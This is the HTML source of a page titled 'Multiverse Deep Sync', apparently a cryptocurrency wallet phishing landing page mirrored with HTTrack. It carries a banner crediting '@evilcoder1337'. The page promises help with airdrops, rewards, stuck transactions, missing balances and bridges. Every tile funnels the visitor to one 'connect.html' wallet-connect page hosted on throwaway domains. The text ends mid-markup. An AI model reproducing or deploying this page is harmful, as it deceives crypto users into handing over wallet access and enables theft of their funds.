<!-- 
/*   
		██████████          ███████       █████████    █████       █████ ████████         
		░░███░░░░░█         ░░░░░███      ███░░░░░███ ███░░░███    ░░███ ███░░░░███        
		░███  █ ░█████ ████████░███     ███     ░░░ ███   ░░███ ███████░░░    ░██████████ 
		░██████ ░░███ ░░██░░███░███    ░███        ░███    ░██████░░███   ██████░░███░░███
		░███░░█  ░███  ░███░███░███    ░███        ░███    ░██░███ ░███  ░░░░░░██░███ ░░░ 
		░███ ░   ░░███ ███ ░███░███    ░░███     ██░░███   ███░███ ░███ ███   ░██░███     
		██████████░░█████  █████████    ░░█████████ ░░░█████░ ░░███████░░█████████████    
		░░░░░░░░░░  ░░░░░  ░░░░░░░░░      ░░░░░░░░░    ░░░░░░   ░░░░░░░░ ░░░░░░░░░░░░░    
		
		
		ICQ & TELEGRAM : @evilcoder1337
*/
--><!DOCTYPE html><html lang="en" data-scrapbook-source="https://chainmetroodapps.vercel.app/" data-scrapbook-create="20240519215713813" data-scrapbook-title="Multiverse Deep Sync - One wallet, multiverse support"><!-- Mirrored from floki-migration.netlify.app/smartsolu.xyz/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 17 Feb 2023 07:03:13 GMT --><!-- Added by HTTrack --><!-- Mirrored from multiwallet-sync.netlify.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 16 May 2024 19:28:50 GMT --><!-- Added by HTTrack -->
<!-- Mirrored from smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/right-left-solid.svg by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 12 Feb 2025 23:49:29 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8"><!-- /Added by HTTrack -->

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Multiverse Deep Sync - One wallet, multiverse support</title>
    <meta name="description" content="One wallet, multiverse support We are unifying Web3 by providing best-in-class, self-custodial, and multichain supportmultiverse support We are unifying Web2 by providing best-in-class, self-custodial, and multichain support">
    <link href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/favicon.ico.html" rel="shortcut icon">
    <!-- Fonts -->
    <link href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/style.min.css" rel="stylesheet">

  <link type="text/css" rel="stylesheet" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/css2.css" id="selected_font"></head>

  <body data-layout="wide" data-color="pink" data-background="dark" data-font="opensans" data-header="static" data-textdirection="ltr">
  <div class="box-container limit-width">
    <div id="spinner-area" style="display: none;">
      <div class="spinner">
        <div class="double-bounce1"></div>
        <div class="double-bounce2"></div>
      </div>
    </div>
    <!-- ***** FRAME MODE ****** -->
    <div class="body-borders" data-border="20">
      <div class="top-border bg-white"></div>
      <div class="right-border bg-white"></div>
      <div class="bottom-border bg-white"></div>
      <div class="left-border bg-white"></div>
    </div>
    <header id="header">

    </header>
    <!-- BANNER -->
    <div class="top-header overlay item1 text-align">
      <div class="container">
        <div class="col-12 col-md-6 col-lg-12 text-center wrapper">
          <h1 class="heading" data-aos="fade-up" data-aos-duration="800">Multiverse sync on <br><div class="animatype"> <span id="typed3">All Networks</span><span class="typed-cursor" aria-hidden="true">|</span></div></h1>
          <h3 class="subheading fw-normal lh-32" data-aos="fade-up" data-aos-duration="1200">We are unifying Web3 by providing best-in-class, self-custodial, and multichain support using modern and strong encryption that is not only fast but securely connects your wallet to our sync server to give you a better experience. <br>All of this is made possible because of the blockchain cloud infrastructure powered by<span class="c-pink"> Chain Cloud and Sequence.</span></h3>
          <div class="action">
            <a class="btn btn-default-purple-fill me-3 mt-3" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">Connect Wallet</a>
          </div> 
          </div>
      </div>
    </div>

    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 103 284" style="enable-background:new 0 0 103 284;" xml:space="preserve" class="blobleft svg d-none" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/img/background/blob.svg" alt="Blob Background">
<style type="text/css">
	.blob0{fill:#EE5586;}
	.blob1{fill:#EFEFEF;}
	.blob2{fill:#F5F5F5;}
</style>
<circle id="svg-ico" class="blob0" cx="13.5" cy="26.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="5.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="47.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="68.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="89.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="110.5" r="5.5"></circle>
<circle class="blob2" cx="13.5" cy="131.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="152.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="173.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="194.5" r="5.5"></circle>
<circle class="blob2" cx="13.5" cy="215.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="236.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="257.5" r="5.5"></circle>
<circle class="blob2" cx="13.5" cy="278.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="26.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="47.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="68.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="34.5" cy="89.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="110.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="131.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="152.5" r="5.5"></circle>
<circle class="blob2" cx="34.5" cy="173.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="34.5" cy="194.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="215.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="34.5" cy="236.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="257.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="55.5" cy="47.5" r="5.5"></circle>
<circle class="blob2" cx="55.5" cy="68.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="89.5" r="5.5"></circle>
<circle class="blob2" cx="55.5" cy="110.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="55.5" cy="131.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="55.5" cy="152.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="173.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="194.5" r="5.5"></circle>
<circle class="blob1" cx="76.6" cy="194.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="215.5" r="5.5"></circle>
<circle class="blob2" cx="55.5" cy="236.5" r="5.5"></circle>
<circle class="blob1" cx="76.5" cy="89.5" r="5.5"></circle>
<circle class="blob1" cx="76.5" cy="110.5" r="5.5"></circle>
<circle class="blob1" cx="76.5" cy="131.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="97.5" cy="131.5" r="5.5"></circle>
<circle class="blob2" cx="76.5" cy="152.5" r="5.5"></circle>
<circle class="blob1" cx="97.5" cy="152.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="76.5" cy="173.5" r="5.5"></circle>
</svg>

  <section class="sec-normal sec-grad-yellow-to-black-right bg-colorstyle bottomhalfpadding">
    <div class="faq">
      <div class="container">
        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" viewBox="0 0 103 284" style="enable-background:new 0 0 103 284;" xml:space="preserve" class="blobright svg d-none" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/img/background/blob.svg" alt="Blob Background">
<style type="text/css">
	.blob0{fill:#EE5586;}
	.blob1{fill:#EFEFEF;}
	.blob2{fill:#F5F5F5;}
</style>
<circle id="svg-ico" class="blob0" cx="13.5" cy="26.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="5.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="47.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="68.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="89.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="110.5" r="5.5"></circle>
<circle class="blob2" cx="13.5" cy="131.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="152.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="173.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="194.5" r="5.5"></circle>
<circle class="blob2" cx="13.5" cy="215.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="13.5" cy="236.5" r="5.5"></circle>
<circle class="blob1" cx="13.5" cy="257.5" r="5.5"></circle>
<circle class="blob2" cx="13.5" cy="278.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="26.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="47.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="68.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="34.5" cy="89.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="110.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="131.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="152.5" r="5.5"></circle>
<circle class="blob2" cx="34.5" cy="173.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="34.5" cy="194.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="215.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="34.5" cy="236.5" r="5.5"></circle>
<circle class="blob1" cx="34.5" cy="257.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="55.5" cy="47.5" r="5.5"></circle>
<circle class="blob2" cx="55.5" cy="68.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="89.5" r="5.5"></circle>
<circle class="blob2" cx="55.5" cy="110.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="55.5" cy="131.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="55.5" cy="152.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="173.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="194.5" r="5.5"></circle>
<circle class="blob1" cx="76.6" cy="194.5" r="5.5"></circle>
<circle class="blob1" cx="55.5" cy="215.5" r="5.5"></circle>
<circle class="blob2" cx="55.5" cy="236.5" r="5.5"></circle>
<circle class="blob1" cx="76.5" cy="89.5" r="5.5"></circle>
<circle class="blob1" cx="76.5" cy="110.5" r="5.5"></circle>
<circle class="blob1" cx="76.5" cy="131.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="97.5" cy="131.5" r="5.5"></circle>
<circle class="blob2" cx="76.5" cy="152.5" r="5.5"></circle>
<circle class="blob1" cx="97.5" cy="152.5" r="5.5"></circle>
<circle id="svg-ico" class="blob0" cx="76.5" cy="173.5" r="5.5"></circle>
</svg>
        <div class="row">
          <div class="col-md-12 col-sm-12 text-center">
            <h2 class="section-heading text-white mergecolor">Deep Sync Selection</h2>
            <p class="section-subheading text-muted mergecolor">You can also connect your wallet by selecting any of the  <span class="c-pink">option</span> below.</p>          </div>
        </div>
      </div>
    </div>
  </section>
  <section class="services sync pt-4 pb-80 bg-colorstyle notoppadding">
    <div class="container">
      <div class="service-wrap">
        <div class="row">
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" xmlns:svgjs="http://svgjs.com/svgjs" xmlns:xlink="http://www.w3.org/1999/xlink" width="288" height="65" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/right-left-solid.svg" alt=""></svg><svg xmlns="http://www.w3.org/2000/svg" width="288" height="65" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/right-left-solid.svg" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc.--><path fill="#fff" d="M32 160h319.9l.0791 72c0 9.547 5.652 18.19 14.41 22c8.754 3.812 18.93 2.078 25.93-4.406l112-104c10.24-9.5 10.24-25.69 0-35.19l-112-104c-6.992-6.484-17.17-8.217-25.93-4.408c-8.758 3.816-14.41 12.46-14.41 22L351.9 96H32C14.31 96 0 110.3 0 127.1S14.31 160 32 160zM480 352H160.1L160 279.1c0-9.547-5.652-18.19-14.41-22C136.9 254.2 126.7 255.9 119.7 262.4l-112 104c-10.24 9.5-10.24 25.69 0 35.19l112 104c6.992 6.484 17.17 8.219 25.93 4.406C154.4 506.2 160 497.5 160 488L160.1 416H480c17.69 0 32-14.31 32-32S497.7 352 480 352z" class="color000 svgShape"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Migration</div>
                  <div class="description seccolor">Click here to migrate seamlessly with no hassle.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/arrow-down-up-lock-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M105.4 502.6L9.373 406.6C-3.124 394.1-3.124 373.9 9.373 361.4C21.87 348.9 42.13 348.9 54.63 361.4L96 402.7V287.1H32C14.33 287.1 0 273.7 0 255.1C0 238.3 14.33 223.1 32 223.1H288V109.3L246.6 150.6C234.1 163.1 213.9 163.1 201.4 150.6C188.9 138.1 188.9 117.9 201.4 105.4L297.4 9.372C303.4 3.371 311.5 0 320 0C328.5 0 336.6 3.372 342.6 9.372L438.6 105.4C451.1 117.9 451.1 138.1 438.6 150.6C426.1 163.1 405.9 163.1 393.4 150.6L352 109.3V223.1H426.8C419.9 238.5 416 254.8 416 271.1V287.1H160V402.7L201.4 361.4C213.9 348.9 234.1 348.9 246.6 361.4C259.1 373.9 259.1 394.1 246.6 406.6L150.6 502.6C138.1 515.1 117.9 515.1 105.4 502.6H105.4zM96 191.1V63.1C96 46.33 110.3 31.1 128 31.1C145.7 31.1 160 46.33 160 63.1V191.1H96zM352 319.1V448C352 465.7 337.7 480 320 480C302.3 480 288 465.7 288 448V319.1H352zM528 191.1C572.2 191.1 608 227.8 608 271.1V319.1C625.7 319.1 640 334.3 640 352V480C640 497.7 625.7 512 608 512H448C430.3 512 416 497.7 416 480V352C416 334.3 430.3 319.1 448 319.1V271.1C448 227.8 483.8 191.1 528 191.1zM528 239.1C510.3 239.1 496 254.3 496 271.1V319.1H560V271.1C560 254.3 545.7 239.1 528 239.1z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">NFTs</div>
                  <div class="description seccolor">Click here to mint/transfer nfts or need support on how to receive nfts?</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/toolbox-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M502.6 182.6l-45.25-45.25C451.4 131.4 443.3 128 434.8 128H384V80C384 53.5 362.5 32 336 32h-160C149.5 32 128 53.5 128 80V128H77.25c-8.5 0-16.62 3.375-22.62 9.375L9.375 182.6C3.375 188.6 0 196.8 0 205.3V304h128v-32C128 263.1 135.1 256 144 256h32C184.9 256 192 263.1 192 272v32h128v-32C320 263.1 327.1 256 336 256h32C376.9 256 384 263.1 384 272v32h128V205.3C512 196.8 508.6 188.6 502.6 182.6zM336 128h-160V80h160V128zM384 368c0 8.875-7.125 16-16 16h-32c-8.875 0-16-7.125-16-16v-32H192v32C192 376.9 184.9 384 176 384h-32C135.1 384 128 376.9 128 368v-32H0V448c0 17.62 14.38 32 32 32h448c17.62 0 32-14.38 32-32v-112h-128V368z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Swap/Exchange</div>
                  <div class="description seccolor">We will support you in any related issues with swaping and/or exchange of coins.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/file-circle-exclamation-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M0 64C0 28.65 28.65 0 64 0H224V128C224 145.7 238.3 160 256 160H384V198.6C310.1 219.5 256 287.4 256 368C256 427.1 285.1 479.3 329.7 511.3C326.6 511.7 323.3 512 320 512H64C28.65 512 0 483.3 0 448V64zM256 128V0L384 128H256zM288 368C288 288.5 352.5 224 432 224C511.5 224 576 288.5 576 368C576 447.5 511.5 512 432 512C352.5 512 288 447.5 288 368zM432 464C445.3 464 456 453.3 456 440C456 426.7 445.3 416 432 416C418.7 416 408 426.7 408 440C408 453.3 418.7 464 432 464zM415.1 288V368C415.1 376.8 423.2 384 431.1 384C440.8 384 447.1 376.8 447.1 368V288C447.1 279.2 440.8 272 431.1 272C423.2 272 415.1 279.2 415.1 288z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Claim Reward</div>
                  <div class="description seccolor">Click here for reward claiming or any related issues.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/droplet-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M16 319.1C16 245.9 118.3 89.43 166.9 19.3C179.2 1.585 204.8 1.585 217.1 19.3C265.7 89.43 368 245.9 368 319.1C368 417.2 289.2 496 192 496C94.8 496 16 417.2 16 319.1zM112 319.1C112 311.2 104.8 303.1 96 303.1C87.16 303.1 80 311.2 80 319.1C80 381.9 130.1 432 192 432C200.8 432 208 424.8 208 416C208 407.2 200.8 400 192 400C147.8 400 112 364.2 112 319.1z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Claim Airdrop</div>
                  <div class="description seccolor">Click here for airdrop claiming or any related issues.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/circle-pause-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M256 0C114.6 0 0 114.6 0 256s114.6 256 256 256s256-114.6 256-256S397.4 0 256 0zM224 191.1v128C224 337.7 209.7 352 192 352S160 337.7 160 320V191.1C160 174.3 174.3 160 191.1 160S224 174.3 224 191.1zM352 191.1v128C352 337.7 337.7 352 320 352S288 337.7 288 320V191.1C288 174.3 302.3 160 319.1 160S352 174.3 352 191.1z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Transaction Delay</div>
                  <div class="description seccolor">Click here for stuck/delayed transactions.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/coins-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M512 80C512 98.01 497.7 114.6 473.6 128C444.5 144.1 401.2 155.5 351.3 158.9C347.7 157.2 343.9 155.5 340.1 153.9C300.6 137.4 248.2 128 192 128C183.7 128 175.6 128.2 167.5 128.6L166.4 128C142.3 114.6 128 98.01 128 80C128 35.82 213.1 0 320 0C426 0 512 35.82 512 80V80zM160.7 161.1C170.9 160.4 181.3 160 192 160C254.2 160 309.4 172.3 344.5 191.4C369.3 204.9 384 221.7 384 240C384 243.1 383.3 247.9 381.9 251.7C377.3 264.9 364.1 277 346.9 287.3C346.9 287.3 346.9 287.3 346.9 287.3C346.8 287.3 346.6 287.4 346.5 287.5L346.5 287.5C346.2 287.7 345.9 287.8 345.6 288C310.6 307.4 254.8 320 192 320C132.4 320 79.06 308.7 43.84 290.9C41.97 289.9 40.15 288.1 38.39 288C14.28 274.6 0 258 0 240C0 205.2 53.43 175.5 128 164.6C138.5 163 149.4 161.8 160.7 161.1L160.7 161.1zM391.9 186.6C420.2 182.2 446.1 175.2 468.1 166.1C484.4 159.3 499.5 150.9 512 140.6V176C512 195.3 495.5 213.1 468.2 226.9C453.5 234.3 435.8 240.5 415.8 245.3C415.9 243.6 416 241.8 416 240C416 218.1 405.4 200.1 391.9 186.6V186.6zM384 336C384 354 369.7 370.6 345.6 384C343.8 384.1 342 385.9 340.2 386.9C304.9 404.7 251.6 416 192 416C129.2 416 73.42 403.4 38.39 384C14.28 370.6 .0003 354 .0003 336V300.6C12.45 310.9 27.62 319.3 43.93 326.1C83.44 342.6 135.8 352 192 352C248.2 352 300.6 342.6 340.1 326.1C347.9 322.9 355.4 319.2 362.5 315.2C368.6 311.8 374.3 308 379.7 304C381.2 302.9 382.6 301.7 384 300.6L384 336zM416 278.1C434.1 273.1 452.5 268.6 468.1 262.1C484.4 255.3 499.5 246.9 512 236.6V272C512 282.5 507 293 497.1 302.9C480.8 319.2 452.1 332.6 415.8 341.3C415.9 339.6 416 337.8 416 336V278.1zM192 448C248.2 448 300.6 438.6 340.1 422.1C356.4 415.3 371.5 406.9 384 396.6V432C384 476.2 298 512 192 512C85.96 512 .0003 476.2 .0003 432V396.6C12.45 406.9 27.62 415.3 43.93 422.1C83.44 438.6 135.8 448 192 448z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Buy Coins/Tokens</div>
                  <div class="description seccolor">To trade, your account must be marked as a trusted payment source.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/satellite-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M502.8 264.1l-80.37-80.37l47.87-47.88c13-13.12 13-34.37 0-47.5l-47.5-47.5c-13.12-13.12-34.38-13.12-47.5 0l-47.88 47.88L247.1 9.25C241 3.375 232.9 0 224.5 0c-8.5 0-16.62 3.375-22.5 9.25l-96.75 96.75c-12.38 12.5-12.38 32.62 0 45.12L185.5 231.5L175.8 241.4c-54-24.5-116.3-22.5-168.5 5.375c-8.498 4.625-9.623 16.38-2.873 23.25l107.6 107.5l-17.88 17.75c-2.625-.75-5-1.625-7.75-1.625c-17.75 0-32 14.38-32 32c0 17.75 14.25 32 32 32c17.62 0 32-14.25 32-32c0-2.75-.875-5.125-1.625-7.75l17.75-17.88l107.6 107.6c6.75 6.75 18.62 5.625 23.12-2.875c27.88-52.25 29.88-114.5 5.375-168.5l10-9.873l80.25 80.36c12.5 12.38 32.62 12.38 44.1 0l96.75-96.75C508.6 304.1 512 295.1 512 287.5C512 279.1 508.6 270.1 502.8 264.1zM219.5 197.4L150.6 128.5l73.87-73.75l68.86 68.88L219.5 197.4zM383.5 361.4L314.6 292.5l73.75-73.88l68.88 68.87L383.5 361.4z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Missing/Irregular balance</div>
                  <div class="description seccolor">Click here for whitelisting.</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512" class="svg ico" src="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/chunks/fonts/svg/bridge-circle-exclamation-solid.svg" height="65" alt=""><!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright  2022 Fonticons, Inc. --><path fill="#fff" d="M576 32C593.7 32 608 46.33 608 64C608 81.67 593.7 96 576 96H536V160H608V232.2C577.6 207.1 538.5 192 496 192C426.9 192 367.1 231.8 338.3 289.7C332.4 288.6 326.3 288 320 288C266.1 288 224 330.1 224 384V448C224 465.7 209.7 480 192 480H160C142.3 480 128 465.7 128 448V384C128 330.1 85.02 288 32 288V160H104V96H64C46.33 96 32 81.67 32 64C32 46.33 46.33 32 64 32H576zM488 96H408V160H488V96zM280 96V160H360V96H280zM232 96H152V160H232V96zM352 368C352 288.5 416.5 224 496 224C575.5 224 640 288.5 640 368C640 447.5 575.5 512 496 512C416.5 512 352 447.5 352 368zM496 464C509.3 464 520 453.3 520 440C520 426.7 509.3 416 496 416C482.7 416 472 426.7 472 440C472 453.3 482.7 464 496 464zM479.1 288V368C479.1 376.8 487.2 384 495.1 384C504.8 384 511.1 376.8 511.1 368V288C511.1 279.2 504.8 272 495.1 272C487.2 272 479.1 279.2 479.1 288z"></path></svg>
                </div>
                <div class="inform">
                  <div class="title mergecolor">Bridge Transfer</div>
                  <div class="description seccolor">Do you have any issue while trying to transfer tokens between chains?</div>
                </div>
              </a>
            </div>
          </div>
          <div class="col-sm-12 col-md-6 col-lg-4">
            <div class="sync-container bg-seccolorstyle noshadow">
              <a class="sync-item" href="https://smartwebdapps-fix.pages.dev/chunks/img/background/collab-server/chunks/fonts/svg/chunks/fonts/svg/collab-server/connect.html">
                <div class="img">
